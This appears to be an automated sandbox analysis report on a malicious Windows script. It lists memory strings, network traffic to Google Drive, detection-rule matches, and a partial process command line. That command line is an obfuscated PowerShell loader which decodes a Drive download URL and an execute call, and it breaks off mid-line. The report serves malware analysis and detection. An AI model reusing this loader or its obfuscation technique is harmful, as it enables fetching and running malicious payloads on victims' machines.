Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: .pdbn8 source: powershell.exe, 00000008.00000002.1468594433.000001D3DC68A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: .pdbc source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: scorlib.pdb= source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: U'n.pdb source: powershell.exe, 00000008.00000002.1469726606.000001D3DC872000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DF4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pe |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DB7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C459B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaWP |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4BDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: amsi64_7432.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= S |